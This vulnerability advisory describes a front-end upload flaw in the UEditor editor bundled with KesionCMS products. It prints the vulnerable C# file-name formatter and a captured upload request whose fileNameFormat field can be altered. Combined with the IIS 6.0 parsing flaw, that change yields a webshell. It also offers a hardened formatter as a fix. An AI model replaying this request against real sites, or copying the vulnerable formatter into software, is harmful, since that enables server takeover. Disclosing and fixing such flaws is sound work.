KesionCMS multi-system front-end Upload Vulnerability
KesionICMS smart site creation system V2.5
KesionEshop online mall system X1.0.141206
KesionIMALL online mall system V2.5
KesionEdu online school training system V2.5
The vulnerability lies in the UEditor editor bundled with the front end of the systems listed above. // It is most likely introduced by the vendor's own customization (secondary development) of UEditor rather than by stock UEditor.

C#
using System;
using System.IO;
using System.Text.RegularExpressions;

public static class NameFormater
{
    // 'format' is the value of the request's fileNameFormat field (see the capture below);
    // 'filename' is the name of the uploaded file.
    public static string Format(string format, string filename)
    {
        if (String.IsNullOrEmpty(format))
        {
            format = "(unknown){rand:6}";
        }
        string ext = Path.GetExtension(filename);
        filename = Path.GetFileNameWithoutExtension(filename);
        // "(unknown)" is replaced with the uploaded file's own base name.
        format = format.Replace("(unknown)", filename);
        // "{rand}" / "{rand:N}" becomes an N-digit random number (default 6 digits).
        format = new Regex(@"\{rand(\:?)(\d+)\}", RegexOptions.Compiled).Replace(format, new MatchEvaluator(delegate(Match match)
        {
            int digit = 6;
            if (match.Groups.Count > 2)
            {
                digit = Convert.ToInt32(match.Groups[2].Value);
            }
            Random rand = new Random();
            return rand.Next((int)Math.Pow(10, digit), (int)Math.Pow(10, digit + 1)).ToString();
        }));
        // Date/time placeholders.
        format = format.Replace("{time}", DateTime.Now.Ticks.ToString());
        format = format.Replace("{yyyy}", DateTime.Now.Year.ToString());
        format = format.Replace("{yy}", (DateTime.Now.Year % 100).ToString("D2"));
        format = format.Replace("{mm}", DateTime.Now.Month.ToString("D2"));
        format = format.Replace("{dd}", DateTime.Now.Day.ToString("D2"));
        format = format.Replace("{hh}", DateTime.Now.Hour.ToString("D2"));
        format = format.Replace("{ii}", DateTime.Now.Minute.ToString("D2"));
        format = format.Replace("{ss}", DateTime.Now.Second.ToString("D2"));
        // Only the characters Windows forbids in file names (\ / : * ? " < > |) are removed;
        // everything else in the caller-supplied format, dots included, is kept and becomes
        // part of the stored file name, followed by the original extension.
        Regex invalidPattern = new Regex(@"[\\\/\:\*\?\042\<\>\|]");
        format = invalidPattern.Replace(format, "");
        return format + ext;
    }
}
Packet Capture
POST /plus/ueditor/imageUp.ashx HTTP/1.1
Host: demo.bkwy.org
Proxy-Connection: keep-alive
Content-Length: 824
Cache-Control: no-cache
Origin: http://demo.bkwy.org
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.36
Content-Type: multipart/form-data; boundary=tmbtrfjfrrifujiwmvskngarqwewwieuo
Accept: */*
Referer: http://demo.bkwy.org/Ueditor/dialogs/image/imageUploader.swf
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: admin=AdminID=76&AdminUser=admin&AdminPass=login&UserType=1&PowerList=&DocPower=1&AdminLoginCode=; myShop=userName=iz8ez4tgy5gw; myViewRecord=userName=login; ASP.NET_SessionId=wfkb2dffjuvnzauyqfpacemj; CheckCode=44T2L; User=userid=191&username=test&password=49ba59abbe56e057&RndPassword=encrypted

--tmbtrfjfrrifujiwmvskngarqwewwieuo
Content-Disposition: form-data; name="fileName"

2.16.gif
--tmbtrfjfrrifujiwmvskngarqwewwieuo
Content-Disposition: form-data; name="dir"

/UploadFiles/2015-3/76
--tmbtrfjfrrifujiwmvskngarqwewwieuo
Content-Disposition: form-data; name="Filename"

2.16.gif
--tmbtrfjfrrifujiwmvskngarqwewwieuo
Content-Disposition: form-data; name="pictitle"

2.16.gif
--tmbtrfjfrrifujiwmvskngarqwewwieuo
Content-Disposition: form-data; name="fileNameFormat"

{time}{rand:6}    // the {time} part before the suffix can be changed to anything except asp, asa, aspx
--tmbtrfjfrrifujiwmvskngarqwewwieuo
Content-Disposition: form-data; name="upfile"; filename="pai.gif"
Content-Type: application/octet-stream

xxxxxx
--tmbtrfjfrrifujiwmvskngarqwewwieuo
Content-Disposition: form-data; name="Upload"

Submit Query
--tmbtrfjfrrifujiwmvskngarqwewwieuo--
By modifying the content of the fileNameFormat parameter and combining it with the IIS 6.0 upload (file-name parsing) vulnerability, an attacker can obtain a webshell.
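The root cause in the NameFormater above is that the format string, and with it most of the stored file name, comes straight from the request's fileNameFormat field, and only Windows-illegal characters are stripped afterwards. The class below is an added example (not Kesion's or UEditor's code) showing the shape of a fix: the naming pattern is fixed on the server, the uploaded extension is checked against a whitelist of image types instead of a blacklist of asp/asa/aspx, and the base name is reduced to [A-Za-z0-9_-] so exactly one extension can remain. The AllowedExtensions list and the ServerFormat string are assumed configuration values.

```csharp
using System;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Text.RegularExpressions;

// Hardened counterpart to the NameFormater shown in the advisory. Added example,
// not Kesion's or UEditor's code; AllowedExtensions and ServerFormat are assumed
// configuration values.
public static class SafeNameFormater
{
    // Extensions the image handler is meant to store; compared case-insensitively.
    private static readonly string[] AllowedExtensions = { ".gif", ".jpg", ".jpeg", ".png", ".bmp" };

    // The naming pattern is fixed on the server. The request's fileNameFormat
    // field is never read, so the client cannot influence the stored name.
    private const string ServerFormat = "{time}{rand:6}";

    // Same placeholders as the original formatter, matched in one pass.
    private static readonly Regex Placeholder =
        new Regex(@"\{(time|yyyy|yy|mm|dd|hh|ii|ss|rand(?::(\d+))?)\}", RegexOptions.Compiled);

    // The final name must be one safe base name plus exactly one allowed extension.
    private static readonly Regex StoredNameShape =
        new Regex(@"^[A-Za-z0-9_-]+\.(gif|jpe?g|png|bmp)$", RegexOptions.Compiled);

    // Returns the name to store the upload under, or null if the upload must be rejected.
    public static string Format(string uploadedFileName)
    {
        // The extension is taken from the upload and checked against a whitelist.
        string ext = Path.GetExtension(uploadedFileName ?? string.Empty).ToLowerInvariant();
        if (!AllowedExtensions.Contains(ext))
            return null;

        DateTime now = DateTime.UtcNow;
        string baseName = Placeholder.Replace(ServerFormat, m => Expand(m, now));

        // Defence in depth: anything outside [A-Za-z0-9_-] is dropped from the base
        // name, so no second extension or separator can survive. The uploaded file's
        // own name is never copied into the stored name (no "(unknown)" token).
        baseName = Regex.Replace(baseName, @"[^A-Za-z0-9_-]", "");
        if (baseName.Length == 0)
            return null;

        string stored = baseName + ext;
        return StoredNameShape.IsMatch(stored) ? stored : null;
    }

    private static string Expand(Match m, DateTime now)
    {
        string token = m.Groups[1].Value;
        if (token.StartsWith("rand"))
        {
            int digits = 6;
            if (m.Groups[2].Success)
                int.TryParse(m.Groups[2].Value, out digits);
            return RandomDigits(Math.Min(Math.Max(digits, 1), 32));
        }
        switch (token)
        {
            case "time": return now.Ticks.ToString();
            case "yyyy": return now.Year.ToString();
            case "yy":   return (now.Year % 100).ToString("D2");
            case "mm":   return now.Month.ToString("D2");
            case "dd":   return now.Day.ToString("D2");
            case "hh":   return now.Hour.ToString("D2");
            case "ii":   return now.Minute.ToString("D2");
            default:     return now.Second.ToString("D2"); // "ss"
        }
    }

    // Cryptographically random digits instead of a fresh System.Random per call.
    private static string RandomDigits(int count)
    {
        var sb = new StringBuilder(count);
        byte[] buf = new byte[count];
        using (var rng = RandomNumberGenerator.Create())
            rng.GetBytes(buf);
        foreach (byte b in buf)
            sb.Append((char)('0' + b % 10));
        return sb.ToString();
    }

    public static void Main()
    {
        // Constructed sample inputs: one legitimate image name, one disallowed type,
        // and one whose extension carries extra characters.
        Console.WriteLine("pai.gif     -> " + (Format("pai.gif") ?? "rejected"));
        Console.WriteLine("page.aspx   -> " + (Format("page.aspx") ?? "rejected"));
        Console.WriteLine("x.GIF;junk  -> " + (Format("x.GIF;junk") ?? "rejected"));
    }
}
```

The important property is that the client no longer has a say in the stored name at all; the character filter and the StoredNameShape check are there only as a second line of defence should a future change reintroduce a caller-supplied format.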